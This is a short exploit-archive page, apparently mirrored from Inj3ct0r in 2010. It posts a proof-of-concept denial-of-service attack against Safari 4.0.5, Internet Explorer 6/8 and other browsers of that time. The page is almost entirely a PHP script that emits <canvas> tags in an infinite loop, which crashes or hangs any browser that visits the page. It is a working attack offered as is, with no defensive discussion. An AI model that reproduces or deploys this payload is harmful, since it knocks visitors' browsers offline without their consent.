Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service
|
来源:Inj3ct0r.com 作者:Jelmer 发布时间:2010-04-29
|
|
============================================================== Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service ==============================================================
<?php # Canvas tag DoS Mozilla firefox 3.6.3 # Canvas tag DoS Safari 4.0.5 (TESTED) # Canvas tag DoS Google Chrome 4.1 # Canvas tag DoS Opera 10.52 # Canvas tag DoS Internet Explorer 6.0 & 8.0 (TESTED) # # Found by Jelmer de Hen # published at http://h.ackack.net/?p=269 # OS: Windows XP SP3 # Mozilla Firefox 3.6.3
echo "<html><body>"; while (1){ echo "<canvas>"; } echo "</body>"; echo "</html>"; ?>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|